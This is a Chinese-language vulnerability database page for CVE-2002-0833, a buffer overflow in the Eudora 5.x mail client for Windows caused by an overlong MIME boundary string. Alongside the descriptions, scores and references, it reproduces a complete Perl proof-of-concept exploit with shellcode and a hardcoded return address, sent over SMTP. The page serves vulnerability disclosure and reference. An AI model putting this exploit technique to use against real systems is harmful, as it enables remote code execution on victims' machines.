CVE-2002-0833
CVSS7.5
发布时间 :2002-08-12 00:00:00
修订时间 :2016-10-17 22:22:21
NMCOE    

[原文]Buffer overflow in Eudora 5.1.1 and 5.0-J for Windows, and possibly other versions, allows remote attackers to execute arbitrary code via a multi-part message with a long boundary string.


[CNNVD]Qualcomm Eudora MIME Multipart 分界缓冲区溢出漏洞(CNNVD-200208-104)

        
        Eudora是一款由QUALCOMM公开开发的邮件用户代理,可运行在Windows和MacOS操作系统下。
        Eudora在接收到信息时没有对boundary值进行充分检查,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击。
        邮件中常用到复合类型,multipart类型表示正文是由多个部分组成,如html,附件等组成,由于复合类型由多个部分组成,因此使用一个成为boundary的隔符来分隔这多个部分。Eudora没有充分检查邮件中boundary值的边界长度,攻击者可以编辑使用超长的字符串作为boundary值的邮件提交给Eudora用户,可导致Eudora产生缓冲溢出,精心构建boundary值可导致以Eudora进程在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:qualcomm:eudora:5.0j
cpe:/a:qualcomm:eudora:5.1.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0833
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0833
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200208-104
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=102858453720304&w=2
(UNKNOWN)  BUGTRAQ  20020805 [SNS Advisory No.55] Eudora 5.x for Windows Buffer Overflow Vulnerability
http://marc.info/?l=bugtraq&m=102883538924494&w=2
(UNKNOWN)  BUGTRAQ  20020808 [SNS Advisory No.55 rev.2] Eudora 5.x for Windows Buffer Overflow Vulnerability
http://www.iss.net/security_center/static/9765.php
(UNKNOWN)  XF  eudora-boundary-bo(9765)
http://www.securityfocus.com/bid/5397
(UNKNOWN)  BID  5397

- 漏洞信息

Qualcomm Eudora MIME Multipart 分界缓冲区溢出漏洞
高危 未知
2002-08-12 00:00:00 2005-10-20 00:00:00
远程  
        
        Eudora是一款由QUALCOMM公开开发的邮件用户代理,可运行在Windows和MacOS操作系统下。
        Eudora在接收到信息时没有对boundary值进行充分检查,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击。
        邮件中常用到复合类型,multipart类型表示正文是由多个部分组成,如html,附件等组成,由于复合类型由多个部分组成,因此使用一个成为boundary的隔符来分隔这多个部分。Eudora没有充分检查邮件中boundary值的边界长度,攻击者可以编辑使用超长的字符串作为boundary值的邮件提交给Eudora用户,可导致Eudora产生缓冲溢出,精心构建boundary值可导致以Eudora进程在系统上执行任意指令。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 暂时不要使用Eudora,换用其他的邮件客户端。
        厂商补丁:
        Qualcomm
        --------
        目前厂商还没有提供补丁或者升级程序,但Qualcomm已经决定在下一个版本中解决这一问题。我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.eudora.com/

- 漏洞信息 (21680)

Qualcomm Eudora 5 MIME Multipart Boundary Buffer Overflow Vulnerability (EDBID:21680)
windows remote
2002-08-05 Verified
0 Kanatoko
N/A [点击下载]
source: http://www.securityfocus.com/bid/5397/info

A buffer overflow vulnerability has been reported in Qualcomm's Eudora mail client for Windows systems. The condition occurs if a MIME multipart boundary is of excessive length. Remote attackers may exploit this vulnerability to execute arbitrary code.

#!/usr/local/bin/perl

#---------------------------------------------------------------------
# Eudora Version 5.0.2-Jr2 exploit for Japanese Windows 2000 Pro (SP2)
# written by Kanatoko <anvil@jumperz.net>
# http://www.jumperz.net/
#---------------------------------------------------------------------

use Socket;

$connect_host   = 'mail.jumperz.net';
$port           = 25;
$env_from       = 'anvil@jumperz.net';
$env_to         = 'target@jumperz.net';
$from           = 'anvil@jumperz.net';
$to             = 'target@jumperz.net';

$iaddr = inet_aton($connect_host) || die "Host Resolve Error.\n";
$sock_addr = pack_sockaddr_in($port,$iaddr);
socket(SOCKET,PF_INET,SOCK_STREAM,0) || die "Socket Error.\n";
connect(SOCKET,$sock_addr) || die "Connect Error\n";
select(SOCKET); $|=1; select(STDOUT);

        #egg written by UNYUN (http://www.shadowpenguin.org/)
        #57bytes
$egg  = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2";
$egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7";
$egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C";
$egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB";
$egg .= "\xFD\xE8\xD4\xFF\xFF\xFF";
$egg .= "notepad.exe";

$buf  = "\x90" x 121;
$buf .= $egg;
$buf .= "\xEB\xA0"; #JMP -0x60
$buf .= "A" x 2;
$buf .= "\x97\xAC\xE3\x77"; #0x77e3ac97 JMP EBX in user32.dll

$hoge = <SOCKET>;
print SOCKET "HELO hoge\x0D\x0A";
$hoge = <SOCKET>;
print SOCKET "MAIL FROM:<$env_from>\x0D\x0A";
$hoge = <SOCKET>;
print SOCKET "RCPT TO:<$env_to>\x0D\x0A";
$hoge = <SOCKET>;
print SOCKET "DATA\x0D\x0A";
$hoge = <SOCKET>;

print SOCKET << "_EOD_";
MIME-Version: 1.0\x0D
>From: $from\x0D
To: $to\x0D
Content-Type: multipart/mixed; boundary="$buf"\x0D
\x0D
.\x0D
_EOD_
$hoge = <SOCKET>;
print SOCKET "QUIT\x0D\x0A";
$hoge = <SOCKET>;
		

- 漏洞信息

13519
Eudora MIME Multipart Message Body Handling Remote Overflow
Context Dependent Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2002-08-05 Unknow
2002-08-05 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站